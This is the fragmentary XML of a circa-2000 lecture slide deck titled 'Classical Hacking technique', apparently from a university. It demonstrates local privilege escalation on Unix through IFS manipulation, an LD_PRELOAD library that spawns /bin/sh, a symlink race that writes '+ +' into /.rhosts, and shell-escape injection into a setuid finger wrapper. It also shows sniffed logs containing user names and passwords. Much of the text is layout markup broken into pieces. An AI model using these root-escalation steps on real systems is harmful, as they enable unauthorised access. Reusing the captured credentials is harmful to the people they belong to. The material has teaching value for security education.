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E76-5AF3-40E1-A616-6F3103A9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15C-488D-4908-8FDE-F3056E8C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1EF6-50F2-4F40-BA9B-616A1684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C6A-B877-4479-84D9-67245C0B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2F8-80CC-41C4-B2BA-7B2B1E8C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CF8-B95F-457C-A507-083E58FB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82F-EAF0-49DA-B3CA-4EF2C7D1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916-222B-4300-8F09-E6A7D957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839-43C2-4837-800D-F4F6708C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D51-BCFE-4020-9AE7-8E2B5A0B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411-8B14-4AB1-9331-60152956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806-2B39-45D4-B61D-8D429F81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4CFD-6F49-49A2-BAE5-1D4D983D00F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assical Hacking techniqu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aeho Oh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LUS01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ohhara@postech.edu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FS attack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FS is Internal Field Separato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Command argument is separated by IFS valu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Default IFS value is ‘ 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Ex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ls –al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&gt;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ls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al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 IFS = ‘ ‘ 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ls/-al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&gt;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ls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al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 IFS = ‘/’ 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FS attack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1} $ cat ex_date.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stdlib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unistd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etuid(0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etgid(0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ystem("/bin/date"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2} $ ls -l ex_dat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--s--x--x   1 root     root        22811 Jan  3 21:19 ex_date*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FS attack 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981080"/>
            <a:ext cx="77724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3} $ cat b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!/bin/s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FS=' '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export IF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/bin/s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4} $ IFS=/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5} $ export IF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6} $ PATH=.:${PATH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7} $ export PAT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FS attack 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981080"/>
            <a:ext cx="7772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8} $ ./ex_dat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 whoam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038480" y="2438280"/>
            <a:ext cx="91440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4114800"/>
            <a:ext cx="502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962520"/>
            <a:ext cx="2971800" cy="78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xecute not “/bin/date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ut “bin date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LD_PRELOAD attack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LD_LIBRARY_PATH is dynamic link library path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LD_PRELOAD is dynamic link library path which is loaded before LD_LIBRARY_PATH is load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LD_PRELOAD attack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981080"/>
            <a:ext cx="77724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1} $ cat ex_print.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stdio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unistd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etuid(0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etgid(0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printf("hello!\n"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2} $ ls -l ex_pri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--s--x--x   1 root     root         4290 Jan  3 21:48 ex_print*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LD_PRELOAD attack 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77724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3} $ cat ex_print_so.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void printf(char *st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execl("/bin/sh","sh",0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4} $ gcc –shared –o ex_print_so.so ex_print_so.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5} $ LD_PRELOAD=./ex_print_so.s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6} $ export LD_PRELOA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LD_PRELOAD attack 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7772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7} $ ./ex_pri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 whoam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Race condition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Race condition is occurred when two or more processes try to use one resour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Race condition of UNIX security is occurred in the file system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Race condition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5909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438280"/>
            <a:ext cx="0" cy="327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2438280"/>
            <a:ext cx="0" cy="327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438280"/>
            <a:ext cx="0" cy="327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666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Normal proc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8769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ttack proc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1981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ccess(“good”,W_OK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95288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Remove “good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ink “good” to “/.rhosts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19810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Open(“good”,O_WRONLY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10080" y="2361960"/>
            <a:ext cx="914400" cy="1066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3429000"/>
            <a:ext cx="28958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Write to not “good” but “/.rhosts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ontents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hysical attack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hell escap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IFS attack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LD_PRELOAD attack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Race condi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Buffer overflo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Race condition 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981080"/>
            <a:ext cx="77724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1} $ cat ex_race.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stdio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unistd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fcntl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nt fd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har *data="+ +\n"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etuid(0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etgid(0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Race condition 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981080"/>
            <a:ext cx="77724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f(access("good",W_OK)==0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leep(3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fd=open("good",O_WRONLY|O_TRUNC|O_CREA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write(fd,data,4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lose(fd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2} $ ls -l ex_r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--s--x--x   1 root     root         4728 Jan  4 13:23 ex_race*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Race condition (5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77724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3} $ ls –l /.rhos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ls: /.rhosts: No such file or director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4} $ touch go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5} $ ./ex_race &amp; ; ln -sf /.rhosts go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6} $ cat /.rhos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+ +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7} $ rlogin –l root localho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 whoam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Buffer overflow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Write unexpected memory area by overflowing buff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e most famous hacking techniqu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lmost all cases, buffer overflow means stack buffer overflo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Recently, heap buffer overflow attack is introduce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Buffer overflow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ackers can execute arbitrary command by overflowing buff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Machine and OS dependent hacking techniqu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s topic will be discussed lat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niff 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Ethernet broadcasts to transmit dat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ackers can see all network packets in the etherne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Network packets contains user id, password, and other useful inform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he Easiest and the most powerful hacking techniqu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niff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066680" y="4724280"/>
            <a:ext cx="3505320" cy="533520"/>
            <a:chOff x="1066680" y="4724280"/>
            <a:chExt cx="3505320" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1066680" y="472428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6668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9548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13" name="BS00580_" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5257800"/>
            <a:ext cx="1146240" cy="965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V="1">
            <a:off x="2590920" y="19810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19810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800600" y="2514600"/>
            <a:ext cx="3505320" cy="533520"/>
            <a:chOff x="4800600" y="2514600"/>
            <a:chExt cx="3505320" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="118" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4800600" y="251460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00600" y="2514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05920" y="2514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2514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22" name="BS00580_" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="5257800"/>
            <a:ext cx="114624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BS00580_" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191120" y="3048120"/>
            <a:ext cx="1145880" cy="965160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="124" name="BS00580_" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019920" y="3048120"/>
            <a:ext cx="1145880" cy="965160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125" name="BS00580_" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696080" y="3048120"/>
            <a:ext cx="1146240" cy="965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V="1">
            <a:off x="1066680" y="472428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724280"/>
            <a:ext cx="1524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1981080"/>
            <a:ext cx="0" cy="2743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1981080"/>
            <a:ext cx="3733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19810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2514600"/>
            <a:ext cx="304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25146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BD06790_" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962520" y="5257800"/>
            <a:ext cx="1295280" cy="1069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90920" y="4724280"/>
            <a:ext cx="1981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4724280"/>
            <a:ext cx="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4724280"/>
            <a:ext cx="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2514600"/>
            <a:ext cx="15238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514600"/>
            <a:ext cx="16765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2514600"/>
            <a:ext cx="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8305920" y="2514600"/>
            <a:ext cx="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743200"/>
            <a:ext cx="19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network pack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434340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roadcast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network pack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571640" y="464832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5029200" y="2514600"/>
            <a:ext cx="1371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467480" y="2514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257440" y="5715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5334120"/>
            <a:ext cx="19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Hacker can se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network pack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niff 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981080"/>
            <a:ext cx="7772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 whoam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 hostnam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gdt.postech.ac.k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niff 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 cat tcp.lo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ogs.postech.ac.kr =&gt; mx1.postech.ac.kr [110]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SER nllbu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PASS cj+]PpS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UID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---- [FIN]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niff (5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981080"/>
            <a:ext cx="7772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211.33.152.182 =&gt; monsky.postech.ac.kr [23]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'$vt100!ohhar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zXfYpZgAd/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----+ [Timed Out]+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ontents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Sniff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 Spoof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isconfigura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 spoof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ackers can spoof their IP addres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ackers try to connect to rsh, rlogin services with spoofed IP addres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ackers have to know the next sequence number to open TCP session with spoofed IP addres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his topic will be discussed lat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Misconfigur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ackers search for admin’s mistak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Ex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Null/simple password accoun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Everyone nfs expor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Writable ftp home director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Opened x window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Physical attack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Search password in admin’s desk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Steal a hard disk or a comput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Break door with a hamm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ocial engineering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Ask admin admin’s passwor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Send email, which tells to change the password, to all user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hell escape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ry to get the shell from program by using shell escape charact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Ex) ; | , ‘ “ ! % &amp; ( ) . . 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hell escape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981080"/>
            <a:ext cx="77724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1} $ cat ex_finger.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stdio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stdlib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include&lt;unistd.h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main(int argc,char **argv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har cmd[100]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etuid(0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etgid(0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981080"/>
            <a:ext cx="77724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if(argc&gt;1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printf(cmd,"/usr/bin/finger %s",argv[1]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system(cmd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2} $ ls -l ex_fing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---s--x--x   1 root     root        22961 Jan  3 19:33 ex_finger*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hell escape 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hell escape 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981080"/>
            <a:ext cx="77724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[ ohhara@ohhara ~ ] {3} $ ./ex_finger 'bin;/bin/sh'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Login name: b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Directory: /usr/b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Never logged i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Mail last read Fri Dec 31 17:50:28 199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No Pla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 whoam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6019920" y="2362320"/>
            <a:ext cx="304560" cy="2209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4572000"/>
            <a:ext cx="4572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Execute “/usr/bin/finger bin;/bin/sh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3T07:03:43Z</dcterms:created>
  <dc:creator>Taeho Oh</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Taeho Oh</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-01-04T12:38:26Z</dcterms:modified>
  <cp:revision>67</cp:revision>
  <dc:subject/>
  <dc:title>Classical Hacking technique</dc:title>
</cp:coreProperties>
</file>